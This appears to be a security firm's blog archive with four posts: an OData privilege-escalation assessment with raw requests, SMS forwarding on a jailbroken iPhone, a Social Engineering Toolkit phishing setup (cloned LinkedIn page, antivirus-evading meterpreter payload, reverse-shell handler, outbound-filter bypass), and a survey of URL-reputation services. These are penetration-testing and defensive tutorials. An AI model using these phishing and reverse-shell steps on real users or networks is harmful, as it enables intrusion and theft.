Tuesday, February 26, 2013

Evaluating OData Applications

By Gursev Kalra.

I was recently evaluating a SaaS provider's OData application, evaluating how its endpoint client application communicated via OData to its backed servers. The client application allowed SaaS consumers to schedule critical computation functions, download the results, and perform additional actions using OData’s RESTful operations.

This blog post aims provide an overview of the OData assessment methodology and also discusses a few interesting findings identified with respect to the specific OData implementation tested.

Understanding Our Target

The first step of any assessment is gain an understanding of how the application functions. Particularly with OData applications, you’ll want to explore all available functionality, monitor its communication using Fiddler, then map out the RESTful operations and the URIs accessed for all the available functionality. Once this is done, you should have an understanding of the application as well as its OData requests and responses. The specific application we were targeting only had one user role so we could test only for horizontal privilege escalation if the Service Metadata Document review did not reveal additional functionality or features.

Looking at the RESTful operations you should be able to determine the Service Root URI and the Service Metadata Document URI. For the application we were targeting, we leveraged these new URIs to perform the following:

  1. We accessed the Service Root URI and it showed several Feeds that were never referred by the thick client. A win? Not until we are able to really access real data.
  2. Next we used Oyedata to perform automated analysis of the OData service (Service Metadata Document) and then exported the fuzzing templates to a text file to be used with the Burp suite for testing. The target OData service did not support JSON format and Oyedata’s ability to generate fuzzing templates in both JSON and XML formats came in as a life saver.
  3. We also downloaded the Service Metadata Document locally for manual analysis.
As a result of all of these steps we discovered several additional Feeds and functionalities that the thick client did not use. Interesting, huh? Let’s move on to the assessment phase.


OyeData is a tool I wrote to help with OData assessments and is pretty much required. If you're unfamiliar with the tool, check out the video:


Now that you fully understand the application and have a good idea of what on the server side is available, you can being to think about available attack vectors. Given what was available for our application, we proceeded to the attack phase with the following:

  1. Check for Horizontal Privilege Escalation.
  2. Identify what data/functionality was available through the additional Feeds discovered.
  3. Attempt RESTful operations that were not utilized by the thick client and shown to exist via automated Oyedata analysis. Oyedata’s data generator also helped by generating random sample data, especially for cryptic data types like Edm.DateTime and Edm.DateTimeOffset.

A Few Interesting Findings

After exhausting our attack vectors (plus a few extra from our methodology) we found some interesting findings. Here are some of them. We modified/obfuscated the output a bit as we’re still awaiting remediation confirmation from the vendor.

Passwords were Stored in Clear and exposed via Feeds

The OData web service exposed username and passwords of all users via its Users feed. This finding highlights two important concerns:

  1. The affected feed had mis-configured access control that allowed access to the Users table.
  2. The database had user passwords in clear.

Privilege Escalation

The thick client did not offer any functionality to add, update or remove new users. The user role we had did not offer it either. However, it was possible to add new logins with privileges of our user account by sending the following RESTful (POST request generated using Oyedata) to the OData service. It was also possible to update or delete other users with the test user account we had.

 POST /XXXXXService.svc/RemoteLogins HTTP/1.1
 Host: www.vulnerablehost.com:8011
 Accept: application/atom+xml,application/atomsvc+xml,application/xml
 Content-Type: application/atom+xml
 Authorization: Basic UmVhbGx5PzpOb3RoaW5nSGVyZTop

 <?xml version="1.0" encoding="utf-8"?>
 <entry xmlns="http://www.w3.org/2005/Atom" xmlns:m="http://schemas.microsoft.com/ado/2007/08/dataservices/metadata" xmlns:d="http://schemas.microsoft.com/ado/2007/08/dataservices">
   <content type="application/xml">
      <d:Password>newpassword </d:Password>

The application also allowed us to download results for other user’s submission’s and was found to be vulnerable to several instances of both Horizontal and Vertical Privilege attacks.

Application Logic Bypass

The client application did not provide any functionality to overwrite or delete past computation submissions however we were able to by abusing the OData web service since it was insecurely configured and allowed updates via PUT method. The previous submissions could also be deleted by issuing the following request. Here the value ‘100’ indicates the submission ID.

 DELETE /XXXXService.svc/Submissions(100) HTTP/1.1
 Host: www.vulnerablehost.com:8011
 Accept: application/atom+xml,application/atomsvc+xml,application/xml
 Content-Type: application/atom+xml
 Authorization: Basic UmVhbGx5PzpOb3RoaW5nSGVyZTop


OData is a new protocol that attempts to be the JDBC/ODBC for the internet and provide a new dimension to data access. Organizations that plan to implement OData should strive to learn more about this wonderful new protocol, the security risks involved and secure it as part of the deployment process.

Tuesday, February 19, 2013

Forwarding SMS to Email on [Jailbroken] iOS

by KrishnaChaitanya Yarramsetty.

As with most ideas, this one also took shape out of necessity to reduce manual work and dependencies in various scenarios. This blog post shows one of the many ways to read SMS messages from a jailbroken iPhone and send it as an email. There are ways to do this using a few Cydia Apps but they usually require you to register for an account or pay for the service which was less than ideal for me.


  • iOS 5.1.1 (9B206) - Other versions may work as well
  • Python 2.7.3 to 3 via Cydia (cydia.radare.org)
  • SQLite 3.x via Cydia (cydia.radare.org)
  • adv-cmds via Cydia (apt.saurik.com)

SMS Storage

iOS stores a lot of data in sqlite databases which, in most cases, can be identified by their “.db” extension. SMS messages are stored in the following files:


The sms.db-wal is a "Write Ahead Log" which is responsible for transactional behavior, while the sms.db-shm is an "Associate File" which is required to read sms.db-wal and the original sms.db.

sms.db is the main file that retains most data, however these files are temporary in nature. The last received SMS message will go into sms.db-wal file. sms.db-wal uses a different format on top of the standard sqlite structure as the sms.db. All three files are read with a single connect() function call from the sqlite API.

Reading the SMS Database

First task at hand is to read sms.db file and analyze the database to find out how iOS is storing SMS messages. For whatever reason many of the sqlite3 utilities seem to have problems opening the file.

Sqlite3.exe and SQLite Database Browser

Although the initial import worked using sqlite3.exe on Windows, attempts to query the sms.db file failed. I also tried SQLite Database Browser which resulted in the below error.

Cydia’s sqlite3 binary

We also tried to read the database file from within iOS using the sqlite3 binary that came with Cydia which proved to be futile:

Text Editor

With all of the utilities having problems reading the file, I decided to just open the file using a text editor to determine if there was something wrong with it. Everything looked fine, so I ran through the file looking for CREATE statements to determine where messages were stored which produced the following structure:

 address TEXT, 
 date INTEGER, 
 text TEXT, 
 flags INTEGER, 
 replace INTEGER, 
 svc_center TEXT, 
 group_id INTEGER, 
 association_id INTEGER, 
 height INTEGER, 
 version INTEGER, 
 subject TEXT, 
 country TEXT, 
 headers BLOB, 
 recipients BLOB, 
 read INTEGER, 
 madrid_attributedBody BLOB, 
 madrid_handle TEXT, 
 madrid_version INTEGER, 
 madrid_guid TEXT, 
 madrid_type INTEGER, 
 madrid_roomname TEXT, 
 madrid_service TEXT, 
 madrid_account TEXT, 
 madrid_account_guid TEXT, 
 madrid_flags INTEGER, 
 madrid_attachmentInfo BLOB, 
 madrid_url TEXT, 
 madrid_error INTEGER, 
 is_madrid INTEGER, 
 madrid_date_read INTEGER, 
 madrid_date_delivered INTEGER);

With a potential idea of where SMS messages might be stored, I decided to use Python’s sqlite API to query the database directly.


smsDBQuery.py uses the standard SQLite API to connect to the sms.db and fetch all the unread messages using the below query:

 SELECT text from message where read=0 order by date desc

To use the smsDBQuery.py, copy it to your device’s /var/mobile/Library/SMS/ directory and run it as follows:

What’s interesting to note is that the sms.db contains even very old messages that aren’t displayed on the device. This is because sms.db-wal retains the latest state for the device’s UI - so only a subset of messages are shown.

Catching New Entries and Sending Email

We can use the SQL TRIGGER statement to catch insert events on the message table when new SMS messages are received. Then our python script will take that message and send an email. We've created the following github repo for all the code:

To accomplish everything, our program works as follows:

  1. Create a temporary message2 table in the original database that is a subset of the main table
  2. Write a TRIGGER on insert event of the database and attach it to the main SMS table. The TRIGGER should read the latest message and insert it into the message2 table without with altering any content in the original message table
  3. Have a secondary script regularly monitor the message2 table and send an email containing the message contents when a new entry is added. We’ll use the emailsent flag to track state


smsCreateTrigger.py will create the database trigger and the message2 table. You’ll only need to run this once to get the database set up. I’d recommend backing up your sms.db just in case and if you get any errors thoroughly inspect them. If you have any problems you can uncomment the DROP statements (and comment the CREATE) to clean up the sms.db.


smsWatcher.py should be run in the background and will poll the message2 table for new entries. Once it sees one, it’ll take the message and send out an email via SMTP. You’ll need to manually set the following variables within the script to the variables applicable to your setup.

 fromaddr   : 'abc@gmail.com'
 toaddrs    : 'xyz@gmail.com'
 username   : 'abc'
 password   : '****'
 server     : smtplib.SMTP('smtp.gmail.com:587')
 smsfromaddress :('AXARWINF','6564567890',)

Note that we’re only forwarding messages from a specific address. If you’d like to forward all messages simply modify the SELECT statement to not use the address field.

With all your variables set up, you can run the smsWatcher process, be sure only one smsWatcher process is running at a time:

 python smsWatcher.py &

Tuesday, February 12, 2013

Configuring SET to Bypass Outbound Filters and Own the Day

By Melissa Augustine and Brad Antoniewicz.

The Social Engineering Toolkit (SET) is a great, easy to use tool for combining social engineering attacks with Metasploit’s extensive framework. However, SET doesn’t always work right out of the box for all networks. Depending on the target, you may need to tweak SET’s code and configuration to work a little better. In this article we’ll walkthrough a real world attack scenario and talk about some tweaks that will help SET function a little better. We’ll use BackTrack 5 R3 for our SET-up (lolpunz).

Basic SET Configuration

We’ll use the SET’s Java Applet attack vector for our attack. SET’s configuration file is stored within the /pentest/exploits/set folder on BackTrack. To edit:

 root@bt:/pentest/exploits/set# cd config
 root@bt:/pentest/exploits/set/config# vim set_config

The default configuration needs a little tweaking to work the way we want it to, here’s what we recommend:

Enable Apache

By default SET uses a Python web server which never seems to be as reliable as we’d like. So if you’re expecting more than one user to connect, its best to leverage Apache.


Self-Sign the Applet

SET will automatically self-sign the Java applet that’s presented to the user. This makes things appear a little more official and makes Java happy.


Name It Something Convincing

It should go without saying that you’ll need to label this something “friendly” and convincing so that you don’t s care aware users. Usually it’s good to match the website you’ve cloned. In our example, we’re cloning LinkedIn, so we’ve set it to match that:

Enable the Java Repeater

The Java Repeater option tells SET to continuously prompt the user even after they’ve clicked “Cancel” to accepting the applet. While this is a bit of an aggressive move that may end up spooking some users, it often results in a higher success rate, so we go for it.


To lessen the impact of the repeater, we usually configure a delay (between when the user clicks “Cancel” and when they’re prompted again) of 5 seconds:


Starting SET and Cloning a Website

With the config file ready, we can start SET:
 root@bt:/pentest/exploits/set# ./set

SET is all menu driven so once its started up you’ll be presented with a banner and menu as shown below. Options 4 and 5 will always show regardless of whether SET it up to date or not so don’t be confused if you just updated. Be sure to start with option 6 to be sure your configuration is made active.

Website Cloning

One of SET’s awesome features is that it can close a website of your choosing. We’ll use LinkedIn.com for this example. Select the following options:

 (1)Social-Engineering Attacks -> 
 (2)Website Attack Vectors ->
 (1)Java Applet Attack Method ->
 (2)Site Cloner

You’ll just need to provide a couple of options for the website cloner to get started. Here’s what we used:
 Are you using NAT/Port Forwarding? (no)
 IP address for the reverse connection (12.x.x.x)
        Next is the creation of the Java Applet:
 Name (LinkedIn)
 Organizational Unit (LinkedIn)
 Name of Organization (LinkedIn)
 City (Santa Monica)
 State (CA)
 Country (US)
        Is this correct? (yes)

 URL to clone (http://www.linkedin.com)

Payloads and Handlers

Metasploit offers tons of payloads we can deliver with our signed Java applet. SET leverages this functionality to make preparing and encoding payloads easy. It’ll also allow you to backdoor a legitimate executable and further obfuscate it. Most antivirus software will easily pick up unpacked, unencoded, or otherwise unobfuscated payloads so it’s worth it to take the time out to do this. We manually generated, packed, and obfuscated a standard metepreter payload since SET doesn’t support using hostnames as the target (more on this in the next section).

If you used SET to generate your payload, then you’re ready to go. However if you created your own, you’ll have to define it as a custom payload within SET:

  (17) Import Your Own Executable
 [path to exectuable]

Also we needed to set up a handler to accept the connectback from the payload we generated. With Metasploit running set up the handler:

 msf> use exploit/multi/handler
 msf exploit(handler)>  set payload windows/meterpreter/reverse_https
 msf exploit(handler)>  set LHOST 11.x.x.x
 msf exploit(handler)>  set LPORT 443
 msf exploit(handler)>  set ExitOnSession false
 msf exploit(handler)>  exploit -j

Great, with SET serving our cloned linkedin.com and our meterpreter handler running, we can accept users. Once they arrive on the site they’ll be prompted to run the Java applet, click “Run” (hopefully), the applet will run invoke our payload! - All ready to go right? Wrong...

Outbound filtering

Strong networks have tight outbound filtering rules which make data exfiltration and connect back shells difficult. Although most networks have at least some outbound filtering rules, they’re usually lax and can be bypassed with little effort. HTTP-80/HTTPS-443 is often permitted outbound but web filters and proxies can get in the way. Web traffic filtering appliances compare outbound traffic to a set of rules that allow or deny traffic depending on criteria defined by the administrator. The criteria can vary greatly depending on the organization’s needs - Sometimes an organization may choose to block websites that fall within a particular subject matter (e.g. known “porn”, “hacking”, etc.. sites) or based on reputation. Other times the organization may just prohibit access to hosts that exist within countries where attacks are known to originate. It really depends on the organization, but at the end of the day, the outbound filter can really make life a pain.

One oddly common filter we see is denying access to IP addresses rather than hostnames. It’s common to see many attacks connect back to an attacker controlled host by IP and so the organizations goal is to use that heuristic to their benefit. Let’s talk about changing SET to defeat that!


Obviously it’s important to test your setup once you think everything should be up and running. When you’re confident in your configuration, make it live and hope for the best. Sometimes things don’t always work as you plan and you’ll have to rely on a bit of charm and wit.

A good friendly employee can do wonders when you discover that people are clicking “Run” but aren't getting owned. First walk the user through getting to the website and ensure the applet loads properly. If you’re not getting a connectback, have the user go directly to the URL that’s hosting the stagger. This URL is dynamically generated by default, so you may have to check the metasploit output to figure out where it is.

This first troubleshooting step is usually where you’ll find the issue. Most commonly it’s the user’s outbound filtering rules. Have the user attempt to browse to IP addresses, hostnames, known sites, unknown sites, etc...

Modifying SET to work with Hostnames

Assuming that we deduced during the troubleshooting step that the organization’s outbound filtering disallows HTTP/HTTPS access to IP addresses but allow browsing to hostnames, we can modify SET to work around that filter. By default however, SET does not support hostnames. It’s a somewhat easy code change to make it support hostnames, but there’s an even easier way with the scenario we’ve described.

Java’s control panel allows you to view the Java Cache, which will gives insight into where the applet is pulling the payload from. To view it in Windows go to the Control Panel – Java, then on the General Tab under “Temporary Internet Files” click “View”.

You can see that our applet is headed to an IP address:

When SET clones a website it’ll add in the HTML to support the Java Applet and pass it a few parameters to detail it’s configuration. Parameters 1, 3, and 4 define the payload, so if we just modify these to point to our hostname rather than an IP Address. This is all stored within the index.html of your webserver. If you have been following along, we’re using Apache and its default webroot is in /var/www on Backtrack.

Now we can take a quick look at the Java Cache again to confirm:

That's it! Pwntime!

Got any more SET configuration Tips? Share in the comments below!


We contacted the developers of SET about supporting hostnames and they updated the version on GitHub to support it! Those guys rock!! Thanks!!

Tuesday, February 5, 2013

Evaluating Potentially Malicious URLs - Part 3

by Tony Lee.

This is the final part of a three part series covering how to handle potentially malicious URLs and IPs. In Part 1, Deobfuscating Potentially Malicious URLs, we laid the groundwork by covering policy, unshortening and deobfuscation. In Part 2 of the series, Attributing Potentially Malicious URLs we continued with WHOIS, geoIP, and IP to URL. Finally, in Part 3 of this series (Evaluating Potentially Malicious URLs) we'll will finish up with reputation and evaluating content.

IMPORTANT: Do not directly navigate to any sites that are present in this article. Some of the sites may no longer be available by the time you read this but I wouldn't press your luck.

For most of this article, we are using two sites that appear to be associated with a BlackHole Exploit Toolkit attack. The first site is believed to be a Traffic Direction Script (TDS). The second site is believed to be the browser detection server. The first site is not on the radar of many reputation sites because the infection appears to be relatively new and may be a legitimate site that had malicious javascript injected into it. The second site has a higher risk rating as you will see below.

First Get Permission If Needed

I won't force you to re-read this section but take this seriously and see the section of the same title in the First Article.


Reputation simply means an opinion or belief about something or someone. In this case we will be asking security companies and organizations their opinions about an IP address or URL. These companies and organizations develop their opinions through a variety of means. Larger organizations like McAfee and Symantec use their vast footprint of product as sensors to discover, track, and trend potentially malicious files, IP addresses, and URLs. Each endpoint helps the cloud become more intelligent which in turn provides better protection to the end user. Both McAfee and Symantec explain how their reputation technology works below:

“McAfee Global Threat Intelligence (GTI) looks out across its broad network of sensors and connects the dots between the website and associated malware, email messages, IP addresses, and other associations, adjusting the reputation of each related entity so McAfee’s security products — from endpoint to network to gateway — can protect users from cyberthreats at every angle.”

Source: http://www.mcafee.com/us/mcafee-labs/technology/global-threat-intelligence-technology.aspx

“Symantec Insight is a reputation-based security technology that leverages the anonymous software adoption patterns of Symantec’s hundreds of millions of users to automatically discover and classify every single software file, good or bad, on the Internet.”

Source: http://www.symantec.com/business/support/resources/sites/BUSINESS/content/live/DOCUMENTATION/5000/DOC5077/en_US/Insight_v1.pdf

Asking McAfee or Symantec for a reputation means they will query their database of knowledge—thus it is different than asking a company or organization to evaluate a site for content—but the line can become blurred. For example, other security companies or organizations must first evaluate a site’s content in order to derive an opinion. Sites such as VirusTotal will let you know if they have already evaluated the site and will give you their immediate opinion or they give you the option to have them evaluate the site again. This is a perfect example of a site that does both—evaluate a site and provide their opinion of reputation.

There are many sites offering their perceived reputation about another site. We have listed our favorite picks below:


McAfee has two different pages that can provide IP/URL reputation: http://www.trustedsource.org/ and http://www.siteadvisor.com. First up is Trusted Source which provides a site’s web and mail reputation (if available). While this does not provide much detail, it is usually fairly accurate.

Next is SiteAdvisor which is traditionally known to be a browser plugin that provides the risk ratings of Internet websites, however the site itself allows you to query for a particular site’s reputation. SiteAdvisor also has a high risk rating for our Blackhole TDS and second stage site.

In this case both Trusted Source and Site Advisor accurately identified our Blackhole TDS site AND the second stage redirect site as high risk sites.

Cisco IronPort SenderBase

IronPort's SenderBase has email and web reputation however a big downside is that it's a bit skimpy on details or reasoning (even after clicking more details).

SenderBase missed the TDS with a risk rating of neutral, however it did have a poor reputation for the browser detection site:

Web of Trust (WOT)

Web of Trust operated in similar fashion to Cisco IronPort’s SenderBase, missed identifying the TDS server, however did correctly identify the second stage site as being dangerous.

Norton (Symantec) Safe Web

Norton’s Safe Web reputation system is very similar to McAfee’s SiteAdvisor and worth checking out. In this particular case, they had no reputation data on our Blackhole TDS site or the second stage server that is the target of the obfuscated iframe redirect.

AVG Site Reports

While we would recommend checking AVG Site Reports for their opinion on a site, we do not recommend their button to visit the site. I know it is marketing for their product, however there is an option to visit the site unsafely which will send the user there. Unfortunately in this case, AVG missed both the first and second stage attacker servers with a rating of “Currently Safe”.

TrendMicro Site Safety

TrendMicro Site Safety incorrectly classified the TDS site as being safe and did not have any data on the second site. Interestingly enough their site states that since they did not have data on the second site, they will now go check it out for the first time. I am not sure how long it takes for them to check it out, but it is not instantaneous. ;)

F-Secure Browsing Protection

Fsecure’s Browsing Protection results are similar to Trendmicro’s. Both sites classified the TDS site as safe and then had never heard of the second stage site—but will now go get their opinion.

Google Safe Browsing

Google’s SafeBrowsing (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=[enter_site_here]) unfortunately, missed both the first and second stage sites as well.

Webroot BrightCloud

Webroot’s BrightCloud missed the first stage TDS site like so many above; however they did state that the second state site had a moderate risk rating (similar to Cisco and mywot). The only problem with this site is the annoying captcha on the left hand side. Ugh!

Evaluating Content

For sites that do not rely on their previous knowledge, they must evaluate the current state of the site when you ask for it. We are splitting this category into two sections—services that run multiple scan engines and services that utilize their own evaluation engines.

Multiple Scan Engines

When most people think about a site that will utilize multiple scan engines to provide results, they usually think of VirusTotal and they are not wrong in doing so. That site is very good at using multiple scan engines, however VirusNoThanks also has URLVoid and IPVoid services that are quite good as well. The best thing about using both sites is they don’t have too much overlap in scan engines.


One nice feature about VirusTotal is that it stores a history of previous queries. Because it does this, it can very clearly alert you if it already scanned a site, when it scanned the site, and the detection ratio of its scan engines. It prompts you with the option to Reanalyse or View last analysis.

NoVirusThanks (URLVoid/IPVoid)

The makers of NoVirusThanks have created two services for scanning potentially malicious URLs and IP addresses—urlvoid.com and ipvoid.com. Because URLVoid does not use the exact same scan engines as VirusTotal this makes a great second reference!

It is very subtle, but in the scan results below—notice the report field. It indicates that the data is 4 months old. It does provide the option to rescan the site; however it requires the user to enter a captcha.

Overall these sites are very valuable in providing multiple perspectives on a site’s maliciousness, but for the most part they stay at the surface. Even though both sites do display a little more detail than just good or bad, it does not go into depth the way the next sites will. This is great for a first gut check and also for people that may want to stay at a higher level with just a good or bad rating, but others may need to dig deeper and provide more context about why the site is bad and what it is doing.

Web Analysis Engine

Web analysis engines are all over the charts in terms of usefulness. Some of them take hours to run (no kidding), some minutes, and some seconds. Some will provide a detailed analysis with exploit detection, some will provide the raw data with little to no exploit detection, and some just provide high level good or bad results. If you created a matrix between time and detail, you will get hits all over the place. We have tried to sift through the plethora of sites online that claim to analyze URLs to bring you our top picks. Please note that this is based on our experience in using the sites and our current blackhole exploit toolkit example. Your mileage and opinion may vary—feel free to leave the opinion in the comments section at the bottom of the article.

Jsunpack and urlQuery are our top picks in turns of providing detailed, yet actionable information. Both have different detection mechanisms, but they are complementary and not redundant.


According to the urlQuery site:

“urlQuery.net is a service for detecting and analyzing web-based malware. It provides detailed information about the activities a browser does while visiting a site and presents the information for further analysis.”

That is no lie either. We were very impressed with their thoroughness and exploit detection. Additionally, the advanced settings allows you to set a User Agent and a referrer and lets you know what version of Adobe reader and Java they are running.

This site does take a little bit of time to run, but it is not unreasonable (45 seconds for our run), but it was worth every bit of that time because it was spot on…

This site provides the IP, ASN, location, screenshot of the site, results of IDS detection from Suricata and Snort. Both engines were correct in reporting the following:

  • Suricata /w Emerging Threats Pro - Malware Network Compromised Redirect
  • Snort /w Sourcefire VRT - Compromised Website response - leads to Exploit Kit

One of the most useful sections of the site is the HTTP Transactions link which shows the next site that the Traffic Direction Script is sending us to:

If you were curious what the analysis of the second stage site looked like, we included it below. That is an insane amount of javascript running on one site. It is also an insane amount of HTTP transactions to sites that are not recognizable. We can only imagine what nastiness is beyond this, but it would be a journey down the malware rabbit hole for sure.


jsunpack (“A Generic JavaScript Unpacker”) did exceptionally well against both sites—similarly to urlquery. This site also allows you to enter a customized referer—which we recommend doing so malware sites don’t pick up on the standard defaults. Jsunpack is handy in detecting the parameters of a site; however the unique capability that jsunpack provides is the ability to download the files. This is VERY dangerous and should only be performed on a malware analysis workstation in a malware analysis environment, but it is really handy for pulling the files apart manually. The output format takes a little getting used to but it is very detailed and useful.

Since the data for these sites are similar to urlquery’s results, I will instead include a screenshot from training that I developed while investigating another incident to showcase jsunpack’s exploit detection (The last time I checked, the site was no longer serving malware—but don’t press your luck):

iseclab (wepawet)

wepawet by iseclab is also a site worth mentioning. It is similar to jsunpack in that it can handle javascript and PDFs. In addition this also handles flash. This site is very useful for looking at javascript writes, network activitiy, and redirects.


Sucuri’s SiteCheck did exceptionally well in finding the page that served up the malicious javascript as well as finding the target of the iframe redirect. It provides a few details about the site and blacklist data as well.

Ironically, Sucuri SiteCheck’s blacklist data shows that McAfee’s SiteAdvisor does not advise visiting this site (as we saw in the previous reputation section)—I would have to agree:

The second stage site is blacklisted by both McAfee’s site advisor as well as Sucuri Malware Labs.

Other sites worth trying that unfortunately did not perform well on this example:


In this article we examined a number of free sites that provide reputation information and other sites that will evaluate content of potentially malicious sites. All of these services can be very useful in eliminating or determining the intention of suspicious URLs and IP addresses. Many of the sites expose an API for automated queries. The list that we provided here is not intended to be all encompassing. However, Googling for these sites does not always provide the best option either. Thus, if you have a favorite gem that was not included in this article please feel free to share it below—we are interested in your experiences as well. :)


Thanks goes out to Vimal Navis of McAfee and Kerry Steele and Drew Thompson of Foundstone for recommending some of these great third party resources.